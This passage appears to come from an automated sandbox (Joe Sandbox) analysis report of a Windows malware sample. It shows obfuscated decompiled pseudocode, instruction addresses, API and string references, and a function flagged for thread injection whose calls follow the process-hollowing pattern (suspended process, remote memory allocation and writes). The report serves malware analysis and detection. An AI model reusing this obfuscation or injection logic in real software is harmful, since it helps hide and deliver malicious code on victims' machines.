									 *_v304 =  *_v304 - _v36;
									_v20 =  *_v104 + _v192;
									_v177 =  *0x41b007 -  *_v312;
									 *_v312 = _v177 -  *0x41b007;
									_t1262 =  *0x43e200; // 0x41b006
									_v153 = _v197 & 0x000000ff &  *_t1262 & 0x000000ff;
									_t1713 =  *0x43e200; // 0x41b006
									 *_t1713 = (_v277 & 0x000000ff) + (_v365 & 0x000000ff);
									 *_v304 =  *_v304 + _v36;
									_v148 = _v148 + 0xb1;
									_v136 = GetCurrentThread();
									_v220 = GetFileSize(_v48,  &_v264);
									_v296 = (_v184 & 0x0000ffff) - (_v12 & 0x0000ffff);
									_t1716 =  *0x43e200; // 0x41b006
									_v365 =  *_t1716 & 0x000000ff |  *0x41b006 & 0x000000ff;
									_v388 = _v392 ^ _v36;
									_t1719 =  *0x43e208; // 0xffff8063
									 *_v304 = _v392 << _t1719;
									_v8 = _v72 >> _v420;
									 *_v304 =  *_v304 & _v392;
									_v300 = (_v184 & 0x0000ffff) + (_v12 & 0x0000ffff);
									_t1724 =  *0x43e200; // 0x41b006
									 *_t1724 = (_v105 & 0x000000ff) - (_v197 & 0x000000ff);
									 *_v304 = _v388 -  *0x43e208;
									_v164 = _v360 + _v8;
									_v177 =  *0x41b007 +  *_v76;
									_v20 =  *_v104 - _v192;
									_v300 = _v296 & 0x0000ffff & _v12 & 0x0000ffff;
									_t2194 =  *0x43e200; // 0x41b006
									_v105 = (_v153 & 0x000000ff) - ( *_t2194 & 0x000000ff);
									_v388 = _v392 | _v36;
									 *_v304 = _v56 >> _v388;
									 *0x43e20c = _v164 << _v72;
									 *_v304 =  *_v304 ^  *0x43e208;
									_v72 = _v360 + _v8;
									_v300 = _v12 & 0x0000ffff & _v184 & 0x0000ffff;
									 *_v312 = _v177 -  *_v76;
									_v36 = _v392 + _v56;
									 *_v104 = _v192 - _v20;
									 *_v76 =  *_v76 - _v177;
									_v36 =  *_v304 + _v56;
									_v300 = (_v12 & 0x0000ffff) + (_v184 & 0x0000ffff);
									_t2208 =  *0x43e200; // 0x41b006
									 *0x41b006 = ( *_t2208 & 0x000000ff) - (_v105 & 0x000000ff);
									_v177 =  *_v312 &  *0x41b007;
									_v192 =  *_v104 | _v20;
									_v56 = _v388 ^ _v36;
									_v8 = _v72 >> _v360;
								} while (_v148 != 0x90a3);
								if(_v8 << _v360 < _v72 + _v420) {
									 *_v304 =  *_v304 - _v392;
									E00407870(_v72, _v420);
									_v300 = _v296 & 0x0000ffff & _v184 & 0x0000ffff;
									_v360 = _v420 +  *0x43e20c;
									 *_v304 = _v392 + _v36;
									 *0x43e20c = _v72 - _v8;
									E00407960(_v192,  *_v76, _v177 & 0x000000ff, _v56);
								}
								_v92 =  &_v420;
								while(_v32 != 0xb428) {
									_v153 = (_v365 & 0x000000ff) - ( *0x41b006 & 0x000000ff);
									_v184 = (_v300 & 0x0000ffff) - (_v296 & 0x0000ffff);
									 *_v304 =  *_v304 + _v56;
									_v8 =  *_v92 + _v72;
									_v420 =  *_v92 - _v360;
									_v164 =  *_v92 ^ _v8;
									_v164 =  *_v92 >> _v72;
									_v32 = _v32 + 0x1d;
									 *0x41b004 =  *_v104 | _v192;
									_v177 =  *0x41b007 <<  *_v76;
									 *_v304 =  *_v304 & _v392;
									_v12 = (_v300 & 0x0000ffff) + (_v184 & 0x0000ffff);
									_v36 = _v392 +  *_v304;
									_v392 = _v36 & _v56;
									_v184 = (_v12 & 0x0000ffff) + (_v296 & 0x0000ffff);
									_t2479 =  *0x43e200; // 0x41b006
									_v197 = ( *_t2479 & 0x000000ff) + (_v105 & 0x000000ff);
									 *_v92 = _v72 - _v8;
									_t1580 =  *0x43e200; // 0x41b006
									 *_t1580 = (_v197 & 0x000000ff) - (_v105 & 0x000000ff);
									_v8 = _v360 - _v72;
								}
								if(( *0x41b006 & 0x000000ff) >> (_v277 & 0x000000ff) > (_v365 & 0x000000ff | _v105 & 0x000000ff)) {
									 *_v92 = _v360 ^  *0x43e20c;
									_t2009 =  *0x43e200; // 0x41b006
									_v105 = ( *_t2009 & 0x000000ff) << (_v153 & 0x000000ff);
									_v296 = _v12 & 0x0000ffff & _v300 & 0x0000ffff;
									_v56 =  *_v304 - _v388;
									 *_v92 =  *_v92 + _v164;
									_v192 = _v20 -  *0x41b004;
									_v177 =  *0x41b007 -  *_v76;
									 *0x41b004 =  *_v104 & _v192;
								}
								_v365 = ( *0x41b006 & 0x000000ff) - (_v153 & 0x000000ff);
								_v248 =  &_v392;
								_v116 =  &_v360;
								_v196 =  &_v8;
								if( *_v76 +  *_v312 != _v177 +  *0x41b007) {
									_v388 = _v56 +  *0x43e208;
									_v376 = ConvertThreadToFiber( &_v365);
									 *_v196 = _v360 ^  *_v116;
									E00407960( *_v104,  *_v312,  *_v312 & 0x000000ff, _v388);
								}
								_v340 = _v296;
								_t2221 =  *0x43e200; // 0x41b006
								asm("cdq");
								_v277 = ( *_t2221 & 0x000000ff) / (_v105 & 0x000000ff);
								 *0x43d188 = _v340 & 0x0000ffff | _v12 & 0x0000ffff;
								_v8 =  *_v92 >> _v420;
								_v64 =  *_v248;
								_t2227 =  *0x43e20c; // 0x0
								_v72 = _t2227 << _v164;
								_v152 =  *_v196;
								if((_v392 &  *0x43e208) <=  *_v248 -  *_v304) {
									_v152 =  *_v116 +  *_v196;
									_v256 = _v296;
									_t1768 =  *0x43e200; // 0x41b006
									asm("cdq");
									_v197 = (_v365 & 0x000000ff) / ( *_t1768 & 0x000000ff);
								} else {
									 *_v304 = _v64 +  *_v248;
									_t1998 =  *0x43e200; // 0x41b006
									_v277 = ( *_t1998 & 0x000000ff) + (_v197 & 0x000000ff);
									_v20 = _v192 &  *0x41b004;
									_v177 =  *0x41b007 -  *_v312;
									E004078A0( *_v104 & 0x0000ffff, _v20 & 0x0000ffff,  *0x41b004 & 0x0000ffff);
									_t2511 = _t2511 + 0xc;
									_t2003 =  *0x43e200; // 0x41b006
									_t2004 =  *0x43e200; // 0x41b006
									 *_t2004 = ( *_t2003 & 0x000000ff) + (_v153 & 0x000000ff);
								}
								_t1770 =  *0x43e208; // 0xffff8063
								_v36 = _v56 << _t1770;
								while(_v356 != 0x8db6) {
									_v72 = _v164 |  *_v116;
									_v8 = _v72 >>  *_v92;
									_v56 = _v392 ^ _v36;
									_v184 = _v300 & 0x0000ffff & _v340 & 0x0000ffff;
									 *0x41b006 = (_v365 & 0x000000ff) + (_v197 & 0x000000ff);
									_v8 = _v360 +  *_v196;
									 *_v196 =  *_v92 + _v420;
									_v388 = _v64 - _v392;
									_t1495 =  *0x43e20c; // 0x0
									 *_v196 = _t1495 - _v360;
									 *_v116 = _v164 + _v8;
									_v177 =  *0x41b007 &  *_v76;
									_v20 = _v192 -  *0x41b004;
									_v256 = _v296 & 0x0000ffff | _v300 & 0x0000ffff;
									_t2401 =  *0x43e200; // 0x41b006
									_t1959 =  *0x43e200; // 0x41b006
									 *_t1959 = ( *_t2401 & 0x000000ff) >> (_v105 & 0x000000ff);
									_t1503 =  *0x43e208; // 0xffff8063
									_v392 = _t1503 ^  *_v304;
									_v152 = _v8 << _v164;
									_t1505 =  *0x43e200; // 0x41b006
									_v153 = ( *_t1505 & 0x000000ff) - (_v197 & 0x000000ff);
									 *_v76 = _v177 &  *_v312;
									_v36 =  *_v304 -  *_v248;
									_v420 =  *_v116 - _v164;
									 *_v92 =  *_v116 - _v72;
									 *_v248 = _v56 + _v392;
									_t2412 =  *0x43e200; // 0x41b006
									 *_t2412 = (_v153 & 0x000000ff) + (_v197 & 0x000000ff);
									_t1971 =  *0x43e208; // 0xffff8063
									 *_v248 = _t1971 +  *_v304;
									 *_v92 =  *_v196 +  *_v116;
									 *_v196 = _v8 & _v360;
									_v20 =  *_v104 >> _v192;
									 *_v76 = _v177 ^  *0x41b007;
									_v356 = _v356 + 0x42;
									 *_v248 = _v36 |  *_v304;
									 *_v104 =  *_v104 << _v20;
									GetProcessId(0); // executed
									_v64 =  *_v248 - _v36;
									_v100 = GetFileSize(_v48,  &_v324);
									 *0x43e208 = _v64 + _v36;
									_t1984 =  *0x43e20c; // 0x0
									_v164 = _t1984 &  *_v116;
									_v420 =  *_v92 -  *_v196;
									 *_v92 = _v360 -  *_v196;
									_t2429 =  *0x43e200; // 0x41b006
									_v105 = ( *_t2429 & 0x000000ff) - (_v197 & 0x000000ff);
									_v340 = (_v296 & 0x0000ffff) + (_v300 & 0x0000ffff);
									_v64 =  *_v248 -  *_v304;
									_v420 =  *_v196 +  *0x43e20c;
									_v152 =  *_v92 +  *_v196;
									_v388 =  *_v304 + _v36;
									 *0x43d188 = (_v184 & 0x0000ffff) << (_v296 & 0x0000ffff);
								}
								_v128 = 0;
								_t1323 =  *0x43e200; // 0x41b006
								_v49 =  *_t1323;
								_v444 =  *_v92;
								if(_v444 == 0) {
									_v329 =  *_v76;
									_t1773 =  *0x43e208; // 0xffff8063
									_v36 = _v388 >> _t1773;
								} else {
									if(_v444 == 0x53f7) {
										 *_v104 = _v192 ^ _v20;
									}
								}
								_v128 = _v128 | 0x00040000;
								_v424 = _v420;
								_t1327 =  *0x43e200; // 0x41b006
								_v365 =  *_t1327 & 0x000000ff | _v197 & 0x000000ff;
								_v44 = GetCurrentThread();
								_v232 = 0xc71a6bb5;
								_v212 = 0x43d188;
								_v72 =  *_v196 & _v8;
								_v232 = _v232 + 0x38e5a57a;
								if(( *_v212 & 0x0000ffff) + (_v184 & 0x0000ffff) >= (_v300 & 0x0000ffff) - ( *0x43d188 & 0x0000ffff)) {
									E00407800(_v329, _v177,  *_v312 & 0x000000ff,  *_v212 & 0x0000ffff);
								}
								_v316 = _v232;
								_t2245 =  *0x41b004 & _v192;
								if(( *0x41b004 & _v192) == _v20 +  *_v104) {
									 *0x43d18c =  *_v248 -  *_v304;
									_v260 =  &_v56;
									_v372 = _v424;
									_v372 = _v8 +  *_v196;
									_t2245 = _v340;
									_v320 = _v340;
									_v40 =  &_v49;
								}
								E004031C0(_t2245); // executed
								_v56 =  *_v260 - _v64;
								_v372 =  *_v116 -  *_v196;
								_v288 = _v420;
								 *0x43e214 = _v340;
								_t1339 = CreateFileW(L"ZcWMD0h\\oqbr2c6\\P5", 0x40000000, 4, 0, 2, 0x80, 0); // executed
								_v308 = _t1339;
								_v384 = _v120(_v128, _v232, _v316);
								 *_v92 =  *_v116 ^  *0x43e20c;
								_v448 =  *_v212 & 0x0000ffff;
								if(_v448 == 0x30) {
									 *_v92 =  *_v116 |  *_v196;
									_v177 =  *_v312 >>  *_v76;
									_v20 = _v192 <<  *_v104;
									E00407960( *_v104,  *_v312,  *_v76 & 0x000000ff,  *_v248);
								} else {
									if((_v300 & 0x0000ffff &  *_v212 & 0x0000ffff) >= (_v12 & 0x0000ffff) - (_v184 & 0x0000ffff)) {
										_v300 = ( *_v212 & 0x0000ffff) + (_v184 & 0x0000ffff);
										 *_v40 = (_v365 & 0x000000ff) + (_v105 & 0x000000ff);
										_v36 =  *_v248 -  *0x43e208;
										_v388 =  *_v304 & _v64;
									}
								}
								_v28 = _v384;
								 *0x43e21c =  &_v20;
								_v68 = _v296;
								_t2261 =  *0x43e200; // 0x41b006
								_v365 = ( *_t2261 & 0x000000ff) + ( *_v40 & 0x000000ff);
								_v336 = 0x8ad62762;
								_v72 = _v288 -  *_v92;
								_v188 = AddAtomW(L"K6W");
								_v240 = 0x43d18c;
								_v424 = _v420 + _v288;
								_v268 = _v152;
								_v328 =  &_v256;
								_v96 = 0x14;
								_v365 = ( *0x41b006 & 0x000000ff) - ( *_v40 & 0x000000ff);
								 *0x43e210 =  &_v329;
								_v60 =  *_v248;
								_v360 = _v164 >>  *_v116;
								_v276 =  &_v177;
								_v244 = _v192;
								_v296 = (_v68 & 0x0000ffff) << ( *_v212 & 0x0000ffff);
								_v13 = _v365;
								_v236 = _v132;
								_v392 = _v388 | _v60;
								_v364 = _v424;
								_v160 = 0xd8ae6cb3;
								if(( *0x43d188 & 0x0000ffff ^ _v256 & 0x0000ffff) <= ( *_v328 & 0x0000ffff & _v12 & 0x0000ffff)) {
									_t2374 =  *0x43e210; // 0x0
									 *_t2374 =  *_v76 -  *_v276;
									E00407800( *_v276, _v329,  *_v312 & 0x000000ff,  *_v212 & 0x0000ffff);
								}
								_v160 = _v160 + 0x2a4821da;
								_v60 = _v36 -  *_v260;
								_v152 = _v72 +  *_v92;
								_v366 =  *_v40;
								while(_v96 < _v160) {
									_v340 = ( *_v212 & 0x0000ffff) + (_v184 & 0x0000ffff);
									 *_v196 =  *_v196 + _v372;
									_v56 = _v392 &  *_v240;
									 *_v92 = _v360 -  *_v116;
									_v268 =  *_v92 - _v72;
									 *0x43e214 = ( *_v328 & 0x0000ffff) + ( *_v212 & 0x0000ffff);
									_v121 =  *_v236;
									_v197 = _v366 & 0x000000ff ^  *_v40 & 0x000000ff;
									_v112 = CreateFileW(L"k1O3fAZUMTw\\tQaeh\\aV6dRwqN\\gAo", 0xc0000000, 1, 0, 0, 8, 0);
									_t2334 =  *0x43e210; // 0x0
									 *_v76 =  *_t2334 >> _v329;
									_v192 =  *_v104 << _v244;
									asm("rol dl, cl");
									_v64 =  *_v248 |  *_v304;
									 *_v196 = _v288 &  *_v116;
									_v296 = ( *_v328 & 0x0000ffff) + ( *_v212 & 0x0000ffff);
									_t2341 =  *0x43e200; // 0x41b006
									 *_v40 = (_v13 & 0x000000ff) + ( *_t2341 & 0x000000ff);
									_v56 = _v392 - _v388;
									 *0x43e20c =  *_v116 +  *_v92;
									_v121 = (_v121 & 0x000000ff) + _v336;
									 *_v92 = _v72 -  *_v196;
									_v60 =  *_v248 +  *0x43d18c;
									_v365 = _v366 & 0x000000ff & _v153 & 0x000000ff;
									_v12 = ( *_v212 & 0x0000ffff) - (_v296 & 0x0000ffff);
									 *_v28 = _v121;
									_v288 = _v164 <<  *_v116;
									_v420 =  *_v116 ^ _v8;
									_v236 = _v236 + 1;
									 *_v248 = _v64 >>  *_v260;
									_v284 = CreateMutexW(0, 0, 0);
									 *_v116 = _v164 | _v424;
									 *0x43e20c = _v152 +  *_v196;
									_v329 =  *_v76 &  *_v276;
									_v28 = _v28 + 1;
									_v244 = _v20 + _v192;
									_v340 = ( *_v328 & 0x0000ffff) - (_v68 & 0x0000ffff);
									 *_v40 = ( *_v40 & 0x000000ff) + (_v277 & 0x000000ff);
									_v60 =  *_v240 -  *_v248;
									 *_v196 = _v8 -  *_v92;
									asm("rol ecx, 0xd");
									_v49 = ( *_v40 & 0x000000ff) - (_v277 & 0x000000ff);
									_v340 = ( *0x43e214 & 0x0000ffff) - ( *_v328 & 0x0000ffff);
									_v336 = _v336 * 0xd2c5;
									 *0x43d18c = _v36 &  *_v260;
									_v228 = AddAtomW(L"P8");
									_v96 = _v96 + 0x4627d;
									 *_v92 = _v420 ^  *_v196;
									_v8 = _v288 |  *_v196;
									_v56 = _v60 << _v388;
								}
								_v197 = (_v13 & 0x000000ff) >> (_v105 & 0x000000ff);
								_v452 = _v184 & 0x0000ffff;
								if(_v452 == 0) {
									_t1819 =  *0x43e21c; // 0x0
									if( *_v104 -  *_t1819 < _v192 + _v20) {
										if((_v177 & _v329) <  *0x41b007 -  *_v312) {
											E00407870(_v152,  *_v116);
										}
									} else {
										_v88 =  &_v340;
										_v344 = 0x43e20c;
										_v288 =  *_v344 + _v164;
										_v249 = _v329;
										 *0x43d190 =  *_v116 -  *0x43e20c;
									}
								} else {
									if(_v452 == 0x4ae) {
										_t2321 =  *0x43e21c; // 0x0
										 *_v104 =  *_v104 -  *_t2321;
									}
								}
								_v176 = _v384 + 0xad;
								_v197 = ( *0x41b006 & 0x000000ff) + (_v366 & 0x000000ff);
								_v24 =  *_v88;
								_v60 =  *_v260 + _v64;
								_v172 = _v132 + 0xad;
								_v352 =  *_v240;
								InitializeCriticalSection( &_v416);
								 *_v196 =  *_v196 +  *_v92;
								if(_v8 -  *_v116 <= _v364 <<  *_v196) {
									_v208 =  &_v288;
									_v13 = (_v365 & 0x000000ff) * (_v105 & 0x000000ff);
								} else {
									_v268 =  *_v196 | _v424;
								}
								_v384( &_v176);
								 *0x43e204 =  &_v12;
								_t1836 =  *0x43d18c; // 0xdfffa04b
								if(( *_v240 & _v388) >= _t1836 + _v56) {
									_t1839 =  *0x43e210; // 0x0
									if( *_v312 +  *_v276 < ( *_t1839 & _v329)) {
										E00407800( *_v76,  *_v76, _v177 & 0x000000ff, _v256 & 0x0000ffff);
									}
								}
								_v60 = _v352 - _v392;
								 *_v116 = _v72 -  *_v208;
								_v420 = _v8 +  *_v208;
								L77:
								 *_v104 =  *_v104 - _v192;
								_t1846 =  *0x43e20c; // 0x0
								E00407870(_t1846, _v8);
								L79:
								_v164 = _v420 | _v72;
								_v177 = _v177 & 0x0000004d;
								E00407870(_v420, _v72);
								_v192 =  *0x41b004 + 0x5a8;
								_t1850 =  *0x43e208; // 0xffff8063
								_v36 = _t1850 - 0x4d39;
								_v420 = _v72 + _v164;
								ExitThread(0xaf);
							}
							_v392 = _v388 + _v56;
							_v72 = _v360 + _v8;
							_v8 = _v164 - _v360;
							_t1591 =  &_v177;
							__imp__CheckNameLegalDOS8Dot3W(_v224,  &_v300, 0x6a, _t1591,  &_v104);
							_v292 = _t1591;
							goto L77;
						}
						E004078F0(_v72, _v72, _v72, _v72);
						goto L79;
					} else {
						_v164 = _v72 >> 0xc;
						_v164 = _v72 << 0xb;
						_t2057 =  *0x43e208; // 0xffff8063
						_v36 = _t2057 ^ 0x0000a268;
						E00407800(_v177, _v177, _v177 & 0x000000ff, _v300 & 0x0000ffff);
						_v72 = _v164 & 0x00002948;
						_v192 =  *0x41b004 - 0x612;
						_v177 = _v177 + 0x51;
						_t1406 =  &_v204;
						__imp__GetFileSizeEx(_v204, _t1406);
						_v144 = _t1406;
						_t2308 =  *0x43e208; // 0xffff8063
						_v36 = _t2308 - 0x9081;
						_v72 = _v164 + 0x211a;
						E004078A0( *0x41b004 & 0x0000ffff, _v192 & 0x0000ffff, _v192 & 0x0000ffff);
						goto L81;
					}
				} else {
					E00407800(_v177, _v177, _v177 & 0x000000ff, _v296 & 0x0000ffff);
					L83:
					_v177 = _v177 - 0x16;
					_v177 = _v177 + 0x62;
					_v380 = SetPriorityClass(_v80, 0x43);
					E00407800(_v177, _v177, _v177 & 0x000000ff, _v296 & 0x0000ffff);
					return _v288;
				}
			}

0x004055da
0x004055e1
0x004055f0
0x004055fe
0x0040560e
0x0040561f
0x0040771e
0x0040772b
0x0040773c
0x0040774e
0x0040776f
0x00000000
0x0040776f
0x0040562a
0x00405631
0x0040563e
0x0040564b
0x004056a9
0x004056b0
0x004056c0
0x004056c6
0x004056d0
0x004056dd
0x004056ea
0x0040564d
0x00405654
0x00405668
0x00405679
0x00405695
0x00405695
0x00405654
0x004056f0
0x004056fa
0x00405701
0x00405707
0x0040570a
0x0040572d
0x0040577f
0x00405788
0x00405798
0x0040579f
0x004057a4
0x004057ba
0x004057c0
0x004057c9
0x004057d8
0x004057e7
0x004057fd
0x0040580c
0x0040581b
0x00405827
0x0040582f
0x0040583d
0x00405850
0x00405861
0x00405873
0x0040588a
0x0040589c
0x004058ab
0x004058ba
0x004058c6
0x004058d9
0x004058ef
0x00405901
0x0040590d
0x0040591f
0x0040592c
0x00405943
0x00405949
0x00405960
0x0040596d
0x0040597e
0x0040598f
0x004059a5
0x004059ab
0x004059b4
0x004059c0
0x0040596f
0x004059d6
0x004059dc
0x004059eb
0x004059fb
0x00405a16
0x00405a73
0x00405a18
0x00405a1f
0x00405a3a
0x00405a40
0x00405a49
0x00405a52
0x00405a62
0x00405a62
0x00405a16
0x00405a7f
0x00405a86
0x00405a9c
0x00405aa2
0x00405aba
0x00405abd
0x00405ac7
0x00405acd
0x00405add
0x00405ae0
0x00405aeb
0x00405afd
0x00405b00
0x00405b12
0x00405b25
0x00405b35
0x00405b41
0x00405b59
0x00405b6c
0x00405b72
0x00405b8c
0x00405b9e
0x00405bad
0x00405bbc
0x00405bcb
0x00405bdd
0x00405be9
0x00405bfe
0x00405c17
0x00405c1d
0x00405c2f
0x00405c42
0x00405c4f
0x00405c5e
0x00405c61
0x00405c73
0x00405c8f
0x00405c9a
0x00405ca6
0x00405cac
0x00405cbd
0x00405ccf
0x00405ce5
0x00405cf9
0x00405d08
0x00405d16
0x00405d2e
0x00405d43
0x00405d57
0x00405d65
0x00405d70
0x00405d80
0x00405d97
0x00405da6
0x00405db5
0x00405dc4
0x00405dd3
0x00405ddf
0x00405dfd
0x00405e15
0x00405e20
0x00405e36
0x00405e3b
0x00405e4b
0x00405e4e
0x00405e64
0x00405e67
0x00405e79
0x00405e86
0x00405e93
0x00405e9f
0x00405ea9
0x00405eb5
0x00405ec1
0x00405ecd
0x00405ed9
0x00405ee0
0x00405efd
0x00405f58
0x00405f5e
0x00405f70
0x00405f83
0x00405f87
0x00405f99
0x00405f9e
0x00405fab
0x00405fbd
0x00405fc9
0x00405fdd
0x00405fee
0x00406004
0x00406020
0x00406029
0x00406033
0x00406049
0x0040604f
0x00406062
0x00406070
0x0040607c
0x00406093
0x004060a6
0x004060ad
0x004060bf
0x004060ce
0x004060da
0x004060e8
0x004060f5
0x0040610c
0x0040611b
0x0040612f
0x00406135
0x00406149
0x00406154
0x00406169
0x0040617e
0x0040618f
0x0040619d
0x004061a8
0x004061b4
0x004061cb
0x004061d8
0x004061f2
0x004061fd
0x0040620d
0x00406229
0x00406234
0x00406247
0x0040625c
0x00406269
0x00406279
0x00406280
0x0040628f
0x004062a6
0x004062b8
0x004062c8
0x004062d6
0x004062d9
0x004062ff
0x00406319
0x00406324
0x00406339
0x0040634c
0x00406361
0x00406369
0x00406385
0x00406385
0x00406390
0x00406393
0x004063b0
0x004063c6
0x004063de
0x004063e8
0x004063f6
0x00406404
0x00406414
0x00406420
0x00406432
0x00406448
0x00406462
0x00406474
0x00406486
0x0040648f
0x004064a2
0x004064a9
0x004064b8
0x004064c7
0x004064d6
0x004064db
0x004064e6
0x004064e6
0x0040650d
0x00406522
0x00406524
0x00406536
0x00406546
0x0040655b
0x0040656c
0x0040657b
0x00406591
0x004065a6
0x004065a6
0x004065bd
0x004065c9
0x004065d5
0x004065db
0x00406604
0x0040660f
0x00406622
0x00406639
0x0040665a
0x0040665a
0x00406666
0x0040666d
0x0040667a
0x0040667d
0x00406690
0x004066a4
0x004066af
0x004066b2
0x004066c0
0x004066cb
0x004066ef
0x00406791
0x0040679e
0x004067ac
0x004067b5
0x004067b8
0x004066f5
0x00406706
0x00406708
0x0040671a
0x00406730
0x00406746
0x00406760
0x00406765
0x00406768
0x0040677a
0x00406780
0x00406780
0x004067c1
0x004067c9
0x004067cc
0x004067e7
0x004067f4
0x00406800
0x00406813
0x0040682a
0x0040683e
0x00406852
0x0040685d
0x00406863
0x00406874
0x00406882
0x00406893
0x004068a9
0x004068bd
0x004068c4
0x004068d3
0x004068d9
0x004068e1
0x004068e8
0x004068f9
0x004068ff
0x00406910
0x0040692b
0x0040693d
0x0040694b
0x0040695c
0x0040696d
0x0040697f
0x00406985
0x0040698d
0x0040699b
0x004069ad
0x004069be
0x004069cf
0x004069e6
0x004069f1
0x00406a08
0x00406a19
0x00406a1e
0x00406a2f
0x00406a43
0x00406a4c
0x00406a55
0x00406a5d
0x00406a70
0x00406a87
0x00406a89
0x00406a9b
0x00406aae
0x00406ac5
0x00406ad6
0x00406ae9
0x00406afa
0x00406b10
0x00406b10
0x00406b1c
0x00406b23
0x00406b2a
0x00406b32
0x00406b3f
0x00406b69
0x00406b75
0x00406b7d
0x00406b41
0x00406b4b
0x00406b5f
0x00406b5f
0x00406b4b
0x00406b89
0x00406b92
0x00406b98
0x00406ba9
0x00406bb5
0x00406bb8
0x00406bc2
0x00406bd7
0x00406be6
0x00406c10
0x00406c32
0x00406c32
0x00406c3d
0x00406c51
0x00406c61
0x00406c73
0x00406c7b
0x00406c87
0x00406c98
0x00406c9e
0x00406ca5
0x00406caf
0x00406caf
0x00406cb2
0x00406cc2
0x00406cd2
0x00406cde
0x00406ceb
0x00406d09
0x00406d0f
0x00406d2a
0x00406d3e
0x00406d49
0x00406d56
0x00406d6a
0x00406d7d
0x00406d92
0x00406db4
0x00406d58
0x00406ddc
0x00406df0
0x00406e07
0x00406e17
0x00406e25
0x00406e25
0x00406ddc
0x00406e31
0x00406e37
0x00406e43
0x00406e47
0x00406e58
0x00406e5e
0x00406e73
0x00406e81
0x00406e88
0x00406e9e
0x00406eaa
0x00406eb6
0x00406ebc
0x00406ed2
0x00406ede
0x00406eec
0x00406efc
0x00406f08
0x00406f15
0x00406f2b
0x00406f38
0x00406f3e
0x00406f4d
0x00406f59
0x00406f5f
0x00406f8a
0x00406f9d
0x00406fa3
0x00406fc7
0x00406fc7
0x00406fd8
0x00406fe9
0x00406ff4
0x00406fff
0x00407005
0x00407026
0x00407041
0x00407051
0x00407062
0x0040706c
0x00407086
0x00407094
0x004070a6
0x004070c6
0x004070c9
0x004070de
0x004070ef
0x004070ff
0x00407114
0x00407128
0x0040713e
0x00407149
0x00407157
0x00407165
0x00407172
0x00407182
0x00407193
0x004071a3
0x004071b6
0x004071ce
0x004071d8
0x004071e7
0x004071f5
0x00407204
0x0040721d
0x0040722b
0x00407240
0x00407250
0x00407267
0x00407273
0x00407283
0x00407299
0x004072b2
0x004072c4
0x004072d5
0x004072dd
0x004072f5
0x0040730a
0x0040731d
0x0040732e
0x0040733f
0x0040734f
0x00407363
0x00407373
0x00407381
0x00407381
0x00407393
0x004073a0
0x004073ad
0x004073ca
0x004073e4
0x00407450
0x0040745d
0x0040745d
0x004073e6
0x004073ec
0x004073ef
0x00407407
0x00407413
0x00407424
0x00407424
0x004073af
0x004073b9
0x0040746a
0x00407478
0x00407478
0x004073b9
0x00407486
0x0040749c
0x004074a8
0x004074b7
0x004074c3
0x004074d1
0x004074de
0x004074f7
0x00407513
0x00407531
0x00407545
0x00407515
0x00407523
0x00407523
0x0040754f
0x00407558
0x0040756c
0x00407577
0x0040758f
0x004075a3
0x004075bf
0x004075bf
0x004075a3
0x004075d0
0x004075e1
0x004075ee
0x004075f4
0x00407606
0x0040760c
0x00407612
0x0040762c
0x00407635
0x00407645
0x00407654
0x00407665
0x0040766c
0x00407678
0x00407684
0x0040768f
0x0040768f
0x00405f08
0x00405f17
0x00405f26
0x00405f2d
0x00405f44
0x00405f4a
0x00000000
0x00405f4a
0x00407627
0x00000000
0x0040572f
0x00405735
0x00405741
0x00405747
0x00405753
0x00405772
0x004076a0
0x004076b0
0x004076c1
0x004076c7
0x004076d5
0x004076db
0x004076e1
0x004076ed
0x004076fb
0x00407716
0x00000000
0x0040771b
0x00405610
0x00407792
0x00407797
0x004077a1
0x004077b1
0x004077c3
0x004077e5
0x004077f4
0x004077f4

APIs

GetFileSizeEx.KERNEL32(?,?,00000017,?), ref: 004076D5
SetPriorityClass.KERNEL32(?,00000043,0000000D,00000017,000000AB), ref: 004077BD

Part of subcall function 00407800: WriteConsoleOutputCharacterW.KERNEL32(00000017,004077EA,000000EC,?,?,?,?,004077EA,00000017,?), ref: 00407821

Strings

0, xrefs: 00406D4F
Dd7\fZ\QcW\isu, xrefs: 00405A35
k1O3fAZUMTw\tQaeh\aV6dRwqN\gAo, xrefs: 004070BB
>, xrefs: 00405966
ZcWMD0h\oqbr2c6\P5, xrefs: 00406D04
m, xrefs: 0040564D
K6W, xrefs: 00406E76

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: CharacterClassConsoleFileOutputPrioritySizeWrite
String ID: 0$>$Dd7\fZ\QcW\isu$K6W$ZcWMD0h\oqbr2c6\P5$k1O3fAZUMTw\tQaeh\aV6dRwqN\gAo$m
API String ID: 4126083347-1512571215
Opcode ID: dc3ee0d845c954f7b2f8b83da2ab67ca984656df5dcf916866736abc0b62c66f
Instruction ID: d7a52c7240ac8adfd81db0b4d59a06222f8979913616ea3fe5b2b88a146d0a57
Opcode Fuzzy Hash: dc3ee0d845c954f7b2f8b83da2ab67ca984656df5dcf916866736abc0b62c66f
Instruction Fuzzy Hash: ED33F434A056688FCB25CF69C990BEDBBB2BF4A301F1481DAD489A7395D7346E80CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0041B189 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041B46A
GetThreadContext.KERNELBASE(?,00010007), ref: 0041B47F
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0041B4A0
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0041B4D2
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0041B4F2
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 0041B625
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 0041B642
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 0041B6AC
